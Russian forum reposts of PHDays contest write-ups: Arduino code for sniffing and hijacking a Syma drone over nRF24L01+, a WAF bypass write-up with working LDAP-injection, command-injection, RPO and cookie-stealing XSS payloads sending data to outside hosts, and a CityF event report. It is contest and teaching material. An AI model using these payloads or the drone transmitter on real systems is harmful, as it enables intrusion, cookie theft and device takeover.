  radio.setCRCLength(RF24_CRC_DISABLED);
  radio.setAddressWidth(addr_len);
  radio.setPayloadSize(len);
  radio.setChannel(chan);
  radio.openReadingPipe(1, pipe);
  radio.startListening();
}

void setup() {
  Serial.begin(2000000);
  printf_begin();
  radio.begin();
  set_nrf();
}

long t1 = 0;
long t2 = 0;
long tr = 0;

void loop() {
  byte in;
   if (Serial.available() >0) {
     in = Serial.read();
     if (in == 'w') {
      chan+=1;
      radio.setChannel(chan);
      Serial.print("\nSet chan: ");
      Serial.print(chan);
     }
     if (in == 's') {
      chan-=1;
      radio.setChannel(chan);
      Serial.print("\nSet chan: ");
      Serial.print(chan);
     }
     if (in == 'q') {
     Serial.print("\n");
     radio.printDetails();
     }
   }
  while (radio.available()) {                 
    t2 = t1;
    t1 = micros();
    tr+=1;
    radio.read(&buff, sizeof(buff) );
    Serial.print("\n");
    Serial.print(tr);
    Serial.print("\tms: ");
    Serial.print(millis());
    Serial.print("\tCh: ");
    Serial.print(chan);
    Serial.print("\tGet data: ");
    for (byte i=0; i<len;i++ ){
      Serial.print(tohex[(byte)buff[i]>>4]);
      Serial.print(tohex[(byte)buff[i]&0x0f]); 
    }
  }
}

Теперь можно на серийном порте забирать готовые данные с установленного канала, смена канала осуществляется посылкой «w» и «s» в порт. Дальнейшую обработку можно производить любым удобным способом: глазами, руками, скриптами. Следует обратить внимание, что скорость порта нестандартная — 2 Мбит/c, это необходимо для того, чтобы Arduino меньше времени занималась I/O, а больше занималась делом (не забываем, что там всего лишь 16 МГц).

45f8a7ec4cb14fbf817fc077c6172488.png


После нахождения канала и поимки адреса следует установить этот адрес в качестве приемного, чтобы отфильтровать данные из космоса:
Код:
uint64_t pipe = 0xa20009890fLL;
byte addr_len = 5;

244b32a4f3aa4891b31d9122e63935c4.png


Затем следует пробежаться по всем каналам и найти все, на которых проскакивает данный адрес. Немного наблюдаем за происходящим и замечаем, что 10, 11 и 12 байт меняются в зависимости от данных, а за ними идет последовательность случайных байтов — шум. Пробуем включить CRC16 (два последних байта) и сменить длину пакета до 10 байт:
Код:
byte len = 10;
radio.setCRCLength(RF24_CRC_16);

c44cf80d37f4459fa529f6c56013f03f.png


Бинго! Мы смогли подобрать все необходимые настройки nRF24L01+, которые используются данным пультом, дальше дело за разбором протокола самой Syma.

Протокол Syma

Разобрать его совсем не сложно, записав немного активности с пульта.

  • Первый байт — значение throttle (стик газа)
  • Второй байт — значение elevator (тангаж — наклон вперед-назад), где старший бит — направление (вперед или назад), а остальные 7 — значение.
  • Третий байт — значение rudder (рысканье — поворот вокруг оси влево-вправо), где старший бит — направление (влево или вправо), а остальные 7 — значение.
  • Четвертый байт — значение aileron (крен — наклон влево-вправо), где старший бит — направление, а остальные 7 — значение.
  • Десятый байт это CRC, которая рассчитывается как XOR от первых 9 байт + 0x55, понять это — пожалуй, самое сложное.

Остальные байты можно оставить такими же, как и перехваченные, там передаются значения регулировок нулевого положения (тримы), и несколько флагов, относящихся к работе камеры.

Осталось сформировать какой-либо валидный пакет, например заставим дрона крутиться вокруг своей оси против часовой стрелки: 92007f000040002400de

Ниже приведен скетч нашего перехватчика с PHDays, который выглядел вот так:

cabbcff79e764be5977d6d6aea3b34d3.png

Код:
#include <SPI.h>
#include <nRF24L01.h>
#include <RF24.h>
#include <stdio.h>

#define CE_PIN  48
#define CSN_PIN 53

//// syma
uint8_t chan[4] = {25,41,57,73};
const char tohex[] = {'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'};
uint64_t pipe = 0xa20009890fLL;

RF24 radio(CE_PIN, CSN_PIN);
int8_t packet[10];
int joy_raw[7];
byte ch=0;

//// controls
uint8_t throttle = 0;
int8_t rudder = 0;
int8_t elevator = 0;
int8_t aileron = 0;

//// syma checksum
uint8_t checksum(){
    uint8_t sum = packet[0];
    for (int i=1; i < 9; i++) sum ^= packet[i];
    return (sum + 0x55);
}

//// initial
void setup() {
  //set nrf
  radio.begin();
  radio.setDataRate(RF24_250KBPS);
  radio.setCRCLength(RF24_CRC_16);
  radio.setPALevel(RF24_PA_MAX);
  radio.setAutoAck(false);
  radio.setRetries(0,0);
  radio.setAddressWidth(5);
  radio.openWritingPipe(pipe);
  radio.setPayloadSize(10);
  radio.setChannel(25);
  //set joystick
  pinMode(A0, INPUT);
  pinMode(A1, INPUT);
  pinMode(A2, INPUT);
  pinMode(A3, INPUT);
  pinMode(A4, INPUT);
  pinMode(A5, INPUT);
  pinMode(A6, INPUT);
  digitalWrite(A3, HIGH);
  digitalWrite(A4, HIGH);
  digitalWrite(A5, HIGH);
  digitalWrite(A6, HIGH);
  //init default data
  packet[0] = 0x00;
  packet[1] = 0x00;
  packet[2] = 0x00;
  packet[3] = 0x00;
  packet[4] = 0x00;
  packet[5] = 0x40;
  packet[6] = 0x00;
  packet[7] = 0x21;
  packet[8] = 0x00;
  packet[9] = checksum();
}

void read_logitech() {
  joy_raw[0] = analogRead(A0);
  joy_raw[1] = analogRead(A1);
  joy_raw[2] = analogRead(A2);
  joy_raw[3] = !digitalRead(A3);
  joy_raw[4] = !digitalRead(A4);
  joy_raw[5] = !digitalRead(A6);
  joy_raw[6] = !digitalRead(A5);
  //little calibration
  joy_raw[0] = map(joy_raw[0],150, 840, 255, 0)+10;
  joy_raw[0] = constrain(joy_raw[0], 0, 254);
  joy_raw[1] = map(joy_raw[1],140, 830, 0, 255);
  joy_raw[1] = constrain(joy_raw[1], 0, 254);
  joy_raw[2] = map(joy_raw[2],130, 720, 255, 0);
  joy_raw[2] = constrain(joy_raw[2], 0, 254);
}

//// main loop
void loop() {
  read_logitech();
  throttle = joy_raw[2];
  rudder = 64*joy_raw[4] - 64*joy_raw[5];
  elevator = joy_raw[1]-127;
  aileron = joy_raw[0]-127;
  radio.openWritingPipe(pipe);
  ch +=1;
  if (ch>3) ch = 0;
  radio.setChannel(chan[ch]); 
  packet[0] = throttle;
  if (elevator < 0) packet[1] = abs(elevator) | 0x80; else packet[1] = elevator;
  if (rudder < 0) packet[2] = abs(rudder) | 0x80; else packet[2] = rudder;
  if (aileron < 0) packet[3] = abs(aileron) | 0x80; else packet[3] = aileron;
  packet[4] = 0x00;
  packet[5] = 0x40;
  packet[6] = 0x00;
  packet[7] = 0x21;
  packet[8] = 0x00;
  packet[9] = checksum();
  radio.write( packet, sizeof(packet) );
}

Если нет желания разбираться с Arduino, можно собрать на этой же библиотеке программу-перехватчик на Raspberry Pi.

6323db6d6e5e4352b848b5e78fd22b66.png


Готовые файлы для Raspberry — github.com/chopengauer/nrf_analyze.

Участники и победители

За два дня конференции в конкурсе приняли участие полтора десятка человек. Заинтересовавшихся было гораздо больше, но многие, узнав, что ломать нужно не Wi-Fi, разочарованно уходили. Многие боятся браться за что-то новое и непонятное, на этом и держится защищенность современного интернета вещей.

Среди участников были те, кто уже строил свои беспроводные сети на nRF24L01+, и те, кто их видел в первый раз.

Уже в середине первого дня один из участников произвел первые попытки воздействия на дрон методом записи сигнала пульта с последующим его воспроизведением, используя SDR (replay-атака). Однако дрон от этого лишь слегка дергался как от помехи. Эта атака бесполезна по причине того, что дрон использует 4 канала с разницей между верхним и нижним в 48 МГц, и воздействия по одному каналу недостаточно для угона.

Уже к вечеру первого дня один из участников обладал всеми необходимыми знаниями об особенностях модуля (двухбайтный адрес 0x00aa) и пытался отсканировать адрес нашего пульта, но проблема была в том, что ему попался даташит от устаревшей версии чипа nRF24L01 (без +), который не поддерживает используемый нашим дроном битрейт 250 Кбит/с. А еще он отказался использовать готовые библиотеки для работы с модулем и работал напрямую с его регистрами. Только хардкор! Ломаем ноги только об свои велосипеды ;)

Победителем конкурса стал Глеб Чербов, которому удалось полностью перехватить управление дроном к 16 часам второго дня. Остальным участникам не удалось перехватить адрес устройства.



Автор: Positive Technologies

 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
wafbypass.jpg


В рамках международного форума по практической безопасностиPositive Hack Days в очередной раз состоялся конкурс WAF Bypass. Как и прежде, задачей участников было решение заданий путем обхода проверок PT Application Firewall, защищавшего уязвимые веб-приложения. Каждое из заданий подразумевало заложенные нами варианты обхода, которые были возможны из-за специально допущенных ошибок в конфигурации. Цель каждого задания — получить флаг, который мог храниться в базе данных, в файловой системе или в Cookie, выдаваемых специальному боту. Описание заданий и способы их решения под катом.

1. m0n0l1th

В этом задании участникам было необходимо провести LDAP-инъекцию и извлечь пароль администратора из LDAP-хранилища. Имелась форма ввода имени пользователя, которое напрямую попадало в запрос к LDAP.

wafbypass_1.png


Стандартные вектора вроде admin)(|(password=*) блокировались регулярным выражением, однако обход был возможен при использовании пробельных символов между операндами в запросе:


Далее, для получения пароля было необходимо применить метод подбора для каждого символа:

Код:
admin)(%0a|(password=a*)
admin)(%0a|(password=a3*)
admin)(%0a|(password=a3b*)
admin)(%0a|(password=a3b8*)
admin)(%0a|(password=a3b8b*)
admin)(%0a|(password=a3b8ba*)

...

2. p0tat0

Открыв задание, участник получал следующую страницу:

wafbypass_2.png


Часть HTML-кода была при этом такой:
HTML:
<title>Caesar was here</title><link href="/index.php/../styles.css" rel="stylesheet"><meta content="browser bot has flag ;)" name="flag"><script src="/index.php/../scripts.js"></script>


На что здесь необходимо обратить внимание? В первую очередь, на объявление переходного синтаксиса HTML в DOCTYPE. Это значит, что будет работать нестрогий парсинг CSS. Вторая особенность — это наличие флага между тэгами link и script и отсутствие переводов строк.

Казалось бы, атакующий не может как-то повлиять на эту статичную страничку, однако если отправить запрос вида /index.php/test, то можно было увидеть, что путь отражается в тэгах link и script. При этом отображается та же страница вместо ошибки 404. Это возможно благодаря особенностям работы веб-сервера Apache (впрочем, такое поведение присутствует не только у него).

Очень похоже на XSS, однако любые кавычки и открывающие тэги экранировались. Для решения этого задания было необходимо применить другой способ, а именно Relative Path Overwrite. RPO эксплуатирует нестрогий парсинг CSS в браузерах, что позволяет заставить жертву корректно интерпретировать инъекцию CSS-стилей в HTML-документе. Внедренные CSS-стили могут использоваться для отправки персональных данных пользователя на сторонний сервер. Сама инъекция происходит через путь:

Код:
/index.php/%250a*%7B%7D%250abody%7Bbackground:red%7D%250a/


При таком запросе браузер подгрузит CSS-стиль по пути:

Код:
/index.php/%0a*{}%0abody{background:red}%0a//../styles.css

В ответе среди HTML-кода браузер увидит валидные CSS-стили:

HTML:
<link href="/index.php/ &lt;br&gt;
*{}&lt;br&gt;
body{background:red}&lt;br&gt;
/styles.css/../styles.css" rel="stylesheet">

Боевой эксплоит для данного задания подразумевает использование CSS-свойств, которые позволят отправить на сторонний сервер флаг, находящийся между двумя фрагментами текста под контролем атакующего. Пример:

Код:
/index.php/')%7D%250a%250a*%7B%7D%250abody%7Bbackground:url('http://test.com/


Однако в задании мы запретили ключевые слова CSS-свойств, которые позволяют сделать запрос на другой сайт:

  • import
  • content
  • image
  • background
  • font
Но не все :) Если посмотреть все известные способы, перечисленные в проекте HTTP Leaks, а также обратить внимание, что в исходном коде присутствует список, то можно было обнаружить, что свойство list-style не блокируется:

Код:
/index.php/')%7D%250a%250a*%7B%7D%250abody%7Blist-style:url('http://test.com/

Такой запрос заставит бота на PhantomJS отправить флаг:

wafbypass_3.png


3. d3rr0r1m

По традиции в рамках конкурса WAF Bypass было задание на обход XXE — инъекцию внешних сущностей XML. Однако в этот раз никому не удалось обойти наши проверки и найти заложенный обход. Блокировались любые вариации инъекции — через внешние обычные сущности, параметрические сущности, DOCTYPE и др. Внимание надо было обратить на обработку XML в разных кодировках — если закодировать тело в UTF-16 Big Endian командой cat x.xml | iconv -f UTF-8 -t UTF-16BE > x16.xml, при этом удалив BOM-метку, то можно было обойти проверки и прочитать флаг из файловой системы.

wafbypass_4.png


4. f0dn3

В данном задании участник получал доступ к простому ToDo-менеджеру, который умел сохранять и восстанавливать из файла список дел:

wafbypass_5.png


Если открыть этот файл в hex-редакторе, то можно было сразу понять, что внутри сериализованный Java-объект (по magic-байтам 0xac 0xed в начале).

wafbypass_6.png


Десериализация Java-объектов, поступающих от пользователя, при наличии уязвимых библиотек может привести к выполнению произвольных команд на сервере. В CLASSPATH мы специально включили commons-collections 4, позволяющий провести RCE. Однако на стороне PT Application Firewall мы запретили две строки, которые присутствуют в эксплоитах ysoserial, являющимся популярным инструментом для реализации данной уязвимости. Первая строка — это собственно «ysoserial», а вторая — «iTransformers», которая присутствует в трех их пяти эксплоитов ysoserial. Для решения задания было необходимо переименовать классы и имена пакетов, исключив строку «ysoserial», при этом воспользовавшись одним из эксплоитов без строки «iTransformers».

wafbypass_7.png


5. n0ctf

На странице задания присутствовал простой ping-сервис с формой ввода IP-адреса. Как же здесь не попробовать кавычку? И, действительно, пользовательcкие данные напрямую попадали в вызов системных команд. Несмотря на то, что большинство способов внедрения команд блокировались, были возможны следующие варианты:

Код:
8.8.8.8|${IFS}cat /etc/flag
-c 1 ya.ru;/*in/cat /etc/flag
1.2.3.4|${a-cat /etc/flag}

wafbypass_8.png


6. c1tyf

Для решения этого задания было необходимо обойти проверку на Cross-Site Scripting в контексте JavaScript-кода. Алгоритм проверки был описан мной и Денисом Колеговым в рамках нашего доклада "Waf.js: как защищать веб-приложения с помощью JavaScript", который мы представили на Positive Hack Days VI. Вкратце, мы пытаемся подставить пользовательские данные в различные контексты и распарсить то, что получилось как JavaScript-код. Если AST-дерево построено, и в нем пристутствуют запрещенные ноды, то блокируем такой запрос. Например, простейший вариант "+alert(1)+" будет заблокирован, так как после подстановки в контекст с двойными кавычками в AST-дереве появится запрещнный узел CallExpression. Однако для конкурса в списке запрещенных узлов отсутствовал узел WithStatement, что позволяло обойти проверку с помощью оператора with:

Код:
http://c1tyf.waf-bypass.phdays.com/?name=\"};with(window){onload=function(){ with(document){k=cookie;};with(window){location='http://robotsfreedom.com/phdays/?a=test'+k;};}}//;

And the winner is...

Победителем конкурса в третий раз подряд стал Георгий Носеевич (@webpentest), в качестве приза ему достался iPad Air 2. Второе место занял другой постоянный участник конкурса Иван Новиков (d0znpp), он был награжден годовой лицензий Burp Suite Pro. Третье же место и сувенирная продукция PHDays достались Владасу Булавасу (vladvis).

И напоследок немного пирожков. В ходе конкурса были заблокированы 31412 запросов.

Распределение по категориям атак:

wafbypass_9.png


Распределение по заданиям:

wafbypass_10.png


Автор: Positive Technologies

Спасибо призерам и всем, кто участвовал!

Арсений Реутов (Raz0r), Игорь Каныгин (akamajoris), Дмитрий Нагибин, Денис Колегов, Николай Ткаченко, Павел Свиридов и PT Application Firewall Team.
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Итоги PHDays VI

PHD-VI_reports_header_1.jpg


Отгремел Positive Hack Days VI. Теперь, когда его события уже стали страницей прошлого, самое время подвести итоги и наметить курс на следующий год. Лейтмотивом шестого PHDays стало противостояние: идея, которая с первых дней создания PHDays бродила в головах организаторов, наконец-то нашла свое воплощение в виде «PHDays VI СityF: Противостояние». Ключевой конкурс форума из узкоспециализированной хакерской игры превратился в двухдневную мегабитву.

Первая попытка сменить паруса и приблизить практические соревнования к реальной жизни была предпринята еще в прошлом году, на пятом PHDays. По сюжету каждая команда CTF представляла собой группировку, действующую в вымышленном государстве. Все события были завязаны на подпольной бирже труда, на которой участники получали заказы на взлом тех или иных объектов. В этом году создатели форума пошли дальше и разбавили хакерский междусобойчик командами защитников и экспертных центров безопасности (SOC). С легкой руки организаторов в игру были вовлечены реальные представители мира информационной безопасности — те, кто в жизни строят системы защиты, противодействует атакам, расследует инциденты.

PHD-VI_reports_SIMIS_2.jpg
«Как правило, в CTF принимают участие только хакерские команды. В то время как люди, отвечающие за безопасность реальных объектов, например, интеграторы, SOC, ИБ-эксперты, не участвуют в этом соревновании. Большая часть ИБ-индустрии была вне игры. Задачей "PHDays VI СityF: Противостояние" было сделать так, чтобы как можно больше людей увидели практическую сторону безопасности. Нам показался очень интересным формат, когда узкоспециализированные команды защиты и нападения занимаются тем, в чем они мастера: команды защитников и SOC строят системы защиты и отбиваются от атак, а хакеры нападают», — комментирует Борис Симис, заместитель гендиректора Positive Technologies по развитию бизнеса.

Консультант по безопасности Cisco Алексей Лукацкий отмечает, что прошедшее мероприятие — это своего рода «новое слово в организации мероприятий по реальной кибербезопасности». «CityF отличается от традиционных киберучений и CTF, живущих по определенным сценариям, тем, что в противостоянии участвовали обе стороны. По сути речь идет о принципе red team vs blue team, когда одна команда атакует компанию, а другая ее защищает. В случае с CityF в качестве такой компании был выбран построенный мини-город, а в качестве красных и синих команд — представители рынка ИБ, которые могли на деле, а не на словах продемонстрировать свои компетенции в обеспечении информационной безопасности», — поясняет он.

Москва не сразу строилась…

Все события разворачивались в некотором городе F, который функционально практически ничем не отличался от обычного миллионника. В нем работали банк, телеком-оператор, электроэнергетическая компания, офис крупного холдинга и «умный» дом. На территории города был развернут собственный интернет с новостными и развлекательными сайтами и соцсетями.

Создатель сотворил мир за шесть дней, однако на возведение города F времени ушло куда больше — целых полгода понадобилось «строителям». Благодаря совместным усилиям организаторов и партнеров в рекордные сроки удалось развернуть все макеты и стенды, которые по технической части были максимально приближены к жизни. Получилась на удивление сложная с точки зрения информационной безопасности инфраструктура.

PHD-VI_reports_LEVIN_3.jpg
Рассказывает менеджер по продвижению продуктов Positive Technologies, член оргкомитета PHDays, член оргкомитета PHDays Михаил Левин: «По вычислительным мощностям это был реальный город. Нам потребовались колоссальные ресурсы — сетевое, серверное, программное обеспечение. Мы построили город собственными усилиями, но, конечно, огромную поддержку нам оказали и наши партнеры — компании Cisco и Check Point, которые предоставили необходимое оборудование, а также активно помогали в его установке и настройке».

В частности, были использованы новые решения: контроллер Cisco APIC (Cisco Application Policy Infrastructure Controller), коммутаторы Cisco Nexus 9000, файрвол Cisco ASA 5585, Check Point Next Generation Firewall.

«С компанией Positive Technologies нас связывают давние отношения — не только профессиональные, но и дружественные. Поэтому мы с радостью и уже не первый год помогаем в организации технической инфраструктуры PHDays. В этом году задача стала более масштабной, так как понадобилось гораздо большее количество сетевого оборудования и серверов, чем это было в прошлом. Но мы справились. Сказать, что мы преследовали какие-то особые или коммерческие цели, я не могу. Просто было желание помочь хорошим людям в организации хорошего дела», — уточняет Алексей Лукацкий.

Нужно отметить, что в подготовке конкурса приняли участие не только крупные компании — были среди участников и настоящие стартапы. Например, компания Loomoon предоставила банку города CityF свою систему ДБО. Бо́льшую часть макета «умного дома» подготовили компании Advantech и ПРОСОФТ.

Не менее серьезно подготовились и непосредственные герои противостояния. По условиям игры команды защитников заранее получили доступ к инфраструктуре для настройки средств защиты своих объектов, и здесь для них не было никаких ограничений. Ключевыми инструментами защитников стали проверенные ими на практике межсетевые экраны уровня приложений, средства защиты сетевого периметра, обнаружения и предотвращения атак, средства корреляционного анализа и даже SIEM. Вендоры также были представлены, что называется, в ассортименте: использовались HP ArcSight, IBM QRadar SIEM, Microsoft Operations Management Suite, Qualys, Bot-Trek TDS, система на базе Security Onion, Balabit Shell Control Box, Windows Server Update Services, различные IDS/IPS.

Впрочем, некоторые из команд защитников и SOC не смогли отказать себе в удовольствии испытать нестандартные решения в боевых условиях CityF. Например, команда False Positive использовала несколько собственных разработок по расследованию инцидентов, а команде You Shall Not Pass пригодились даже старенький телефон Motorola С118 и виртуальная машина Ubuntu для мониторинга GSM-сети.

Если защитники вооружились не на шутку, то атакующие, напротив, ринулись в бой практически с голыми руками, вооружившись ноутбуками и стандартным хакерским набором. В основном это были инструменты для проведения атак на веб-приложения Burp Suite, сканирования IP-сетей Nmap, захвата и анализа сетевого трафика Wireshark, восстановления паролей Cain & Abel, создания и отладки эксплойтов Metasploit.

Ломаем по живому

PHD-VI_reports_Yunusov_4.jpg
Противостояние стало вызовом не только для организаторов, но и для участников, которым оказались в новинку и правила, и игровой мир. Абстрактные задачи остались в прошлом, на этот раз перед участниками стояли реальные цели. По словам руководителя отдела безопасности банковских систем Positive Technologies, члена оргкомитета PHDays Тимура Юнусова, «классический CTF, несмотря на все свои преимущества, все же оторван от реальности: все сводится к решению головоломок и выполнению искусственных заданий». Главная же задача, которую преследовали организаторы, — наглядно показать, как на самом деле ломают и защищают живые системы (да еще так, чтобы происходящее было понятно и тем, кто мало знаком с хакерским миром). В качестве заданий хакерам предложили украсть деньги из банка, обеспечить себя безлимитной мобильной связью, устроить аварию на гидроэлектростанции, оставить без света умный дом, а командам защитников и SOC — противостоять атакующим. Собственно, все как в жизни.

Конечно, любое подобное мероприятие сопряжено с трудностями. К счастью, возникшие сложности удалось преодолеть, и, несмотря на все перипетии, большинство участников положительно оценивают опыт, полученный во время соревнования.

«Несмотря на некоторый сумбур в организации, связанный как с масштабом мероприятия, так и со сменой формата, мы зарядились драйвом на год вперед. В процессе CityF были некоторые накладки и непонимание правил и принципов определения счета, но награждение сняло все вопросы», — комментирует Иван Мелехин, технический директор компании «Информзащита», которая, между прочим, отправила в CityF целых две команды — izo:SOC и weIZart (защитников и SOC).

Однако некоторым все-таки не хватило огонька: некоторые хотели посоревноваться не только с хакерами, но и с коллегами по цеху. Конечно же, нашлись и те, кому ближе принципы старого доброго CTF.

«Впечатления от игры неоднозначные: интересная идея, подготовлены практические задачи, но недостаточно налажено игровое взаимодействие и система очков и штрафов (особенно для защитников)», — считает участник команды Rdot Омар Ганиев. Поддерживает его и участник filthy thr33 Кирилл Шилиманов: «Соревнование оставило смешанные чувства. Первый день для атакующих практически ушел впустую, поскольку к сервисам просто не было доступа. Когда они открылись и начались взломы, стало намного веселее. Отметим, что сервисы были подготовлены сложные, интересные, за что большое спасибо организаторам».

30-часовая битва

Противостояние длилось около тридцати часов, это был настоящий марафон по противодействию массированным атакам. В распоряжении участников было пять объектов, которые защищали пять команд защитников и три команды SOC. За два дня судьи зафиксировали от 3 до 20 тысяч событий безопасности на каждом объекте защиты и всего около 200 серьезных атак, большая часть из которых привела к значимым результатам.

В 99% случаев атаки были сконцентрированы на периметре защищаемых объектов. Как и в реальной жизни, наиболее распространенным вектором стали атаки на веб. Впрочем, это не было сюрпризом для защитников, они заранее предполагали такой ход событий и были готовы к обороне.

«Мы защищали офисную инфраструктуру, особое внимание уделяя защите веб-серверов. Как оказалось, не зря: хакеры использовали множество инструментов для пентеста, и если с эксплойтами для операционных систем IPS справлялась, то изощренные атаки на веб-серверы и атаки на логику работы приложений можно было обнаружить только в ручном режиме, анализируя логи WAF, веб-серверов и расширенные логи операционных систем», — рассказывает Дмитрий Березин, эксперт по информационной безопасности компании «КРОК», участник команды Green.

Вопреки ожиданиям защитников, еще один популярный на практике вектор — атаки с использованием социальной инженерии — не был активно задействован участниками противостояния. Лишь одна команда хакеров воспользовалась невнимательностью противника и сфотографировала логины и пароли от внутреннего форума команды защитников. Однако эти данные не привели ни к какому серьезному инциденту. «Мы очень ждали применения социальной инженерии, но атакующие практически не использовали такие технологии», — сокрушается руководитель Solar JSOC компании Solar Security Владимир Дрюков, участник команды False Positive.

Позже защитники признались, что готовились к худшему, поэтому были вооружены до зубов и подготовили ловушки. Ожидали абсолютно всего: эксплуатации уязвимостей в приложениях, веб-приложениях, ОС и сервисах, ошибок конфигурирования. На деле все оказалось иначе.

«Наша команда защищала все объекты — рабочие станции операторов, серверы, корпоративную почту, домен, ДБО, системы видеоконференцсвязи, электронного документооборота и обмена мгновенными сообщениями. Значительная часть подготовленных рубежей защиты не пригодилась: хакеры не проникли во внутреннюю сеть. Мы не увидели атак на сетевой протокол аутентификации Kerberos типа Golden Ticket и Pass-the-Hash, атак посредством троянов и бэкдоров. Также хакеры не залезли ни на один подготовленный honeypot. Никто из хакеров даже не попытался сломать уязвимый сервер proFTPD», — рассказывает руководитель направления AST Group Инна Сергиенко, участница команды «ACT».

Команда False Positive похвасталась, что на защищаемой им инфраструктуре атакующим удалось получить только один флаг: «Организаторы ввели около семи новых сервисов на периметре одновременно, и мы с защитниками немного опоздали с обеспечением профиля безопасности последней системы, настраивая другие шесть. Но недолго атакующие праздновали победу: уже через пару минут нам удалось восстановить состояние системы и ее безопасность».

Кстати, в рамках игры показала свою эффективность совместная работа команд защитников и SOC. По оценкам судей, все команды SOC собрали наиболее полную картинку происходящего на объектах, в то время как защитники вынуждены были оперативно реагировать на инциденты. Например, в ситуации, когда по условиям игры защитники промышленных систем выключили защиту, команда SOC, осуществляющая мониторинг промышленной системы, подробно изучила действия атакующих, начало атаки, ее реализацию. В реальной жизни это бы соответствовало возможности оперативных действий по пресечению атак даже без вмешательств инструментов защиты.

PHD-VI_reports_SCADA_5.jpg


«Команда "Информзащиты" защищала гидроэлектростанцию и подстанции 500 и 10 кВ. По сценарию игры вечером первого дня соревнования мы начали ослаблять защиту, к концу дня практически все СЗИ были выключены. Только SOC осуществлял мониторинг. За время пока объект был под защитой, ни одной успешной атаки на инфраструктуру проведено не было. Все остальные взломы и затопления происходили тогда, когда инфраструктура была не защищена», — комментирует события участник Иван Мелехин.

Итого хакерам успешно удалось:

  • угнать учетные записи, в том числе несколько доменных;
  • провести атаки на физическое оборудование АСУ (был проведен сброс воды, отключены линии, сожжены провода ЛЭП);
  • проникнуть в технологическую сеть АСУ через уязвимости корпоративной сети;
  • провести сетевые атаки на системы умного дома (отключить оборудование от сети);
  • украсть деньги из банка (около 22 000 рублей) и получить данные банковских карт;
  • украсть и в некоторых случаях удалить резервные копии системных файлов, дисков, архивов, принадлежащие офису CorpF;
  • провести атаки на GSM/SS7 с последующей кражей денег путем подделки USSD-запросов;
  • провести взаимные атаки как на сотрудников команды защиты, так и на команды нападающих (хакеры, используя методы социнженерии, украли пароль от форума защитников, а команда защитников Vulners взломала компьютеры хакеров);
  • провести дефейсы множества веб-ресурсов, в их числе сайт офиса CorpF;
  • обнаружить одного инсайдера — сотрудника офиса CorpF.
Итоги

Форум наглядно показал, что специалисты по информационной безопасности в силах обеспечить очень высокий уровень защиты без нарушения технологического процесса. Финальной цели — захватить домен города и выиграть соревнование — ни одной команде хакеров достигнуть не удалось. Такой исход оказался неожиданным и для организаторов: они прогнозировали победу хакеров. По итогам игры жюри не смогло назвать явных победителей, призовые места заняли команды хакеров, которые оказались лучшими по ходу игры. Команды защитников и SOC были награждены в различных номинациях.

PHD-VI_reports_KACHALIN_6.jpg
Алексей Качалин, заместитель директора по развитию бизнеса компании Positive Technologies в России, член оргкомитета PHDays комментирует итоги противостояния: «Победили все — и организаторы, и участники. Это уникальное событие и сложно выработать четкие правила, не поиграв. Надеемся, что те, кто принял участие в этом году, придут к нам в следующем и помогут в подготовке игры. Мы будем привлекать команды защиты и нападения для формирования правил и формата».

PHD-VI_reports_V_7.jpg
Однозначно можно сказать, что PHDays VI удался, с этим согласна и директор форума PHDays Виктория Алексеева: «PHDays — это прежде всего люди, на энтузиазме которых делается это мероприятие. Целый год более 100 человек делали все, чтобы форум стал не просто "ивентом", а настоящим праздником. Каждый раз мы, организаторы, преодолеваем себя, делаем шаг вперед, ставим новые рекорды. Я считаю, что все удалось: 4200 участников — тому подтверждение. Хочу выразить благодарность всем, кто помог нам в организации PHDays!».

Пока трудно прогнозировать, под каким лозунгом пройдут форум и конкурсы в следующем году, но организаторы намерены развить концепцию противостояния. Говорят, что нас ожидает развитие игрового сюжета: будет больше экшена, социнженерии и событий, связанных, например, с увольнением сотрудника, больше изменений в бизнес-процессах, появятся дневные и ночные сценарии. И, конечно, в будущем CityF обещает стать еще более «населенным».

PHD-VI_reports_YM_8.jpg
«Мы видим, как в последние годы стремительно меняется окружающий нас мир. Кибербезопасность все сильнее проникает в повседневные технологии. Угрозы становятся все сложнее, атаки — более изощренными, а ущерб от них — все ощутимее. Строить системы защиты по-старому уже не получается — необходимо быстро совершенствовать методы защиты, но еще быстрее развиваться нам самим. Под стать этому меняется и PHDays. Мы рады, что в этом году наша конференция обрела еще один смысл: дать возможность разным представителям индустрии поучаствовать в противостоянии и получить реальный опыт защиты объектов критически важной инфраструктуры. И горящие глаза ребят после 30 часов битвы для нас лучшая награда. Но мы не хотим останавливаться на достигнутом, и в следующем году мы расширим список участников противостояния профессиональными пентестерами и другими представителями IT-сферы», — делится идеями генеральный директор Positive Technologies Юрий Максимов.

Уже сейчас многие партнеры и команды высказали готовность принять участие в следующих соревнованиях. Например, Алексей Лукацкий предлагает не сбрасывать со счетов Cisco в планах на PHDays VII: «Думаю, что у такого формата блистательные перспективы и CityF задал очень высокую планку для CTF, которые будут организовываться в будущем. И если геополитическая ситуация в мире не ухудшится, то компания Cisco вновь станет технологическим партнером PHDays. Безусловно, стоит рассматривать нас и в качестве спикеров будущего мероприятия и, возможно, даже в качестве защитников какого-либо сегмента CityF. Но эту идею нам еще надо обмозговать внутри компании».

Каким будет PHDays VII, — покажет время. Однако уже сейчас мы уверенно можем сказать, что седьмому форуму быть!

_MG_5604_9.jpg


Источник: http://www.phdays.ru/press/news/77074/
 
Сверху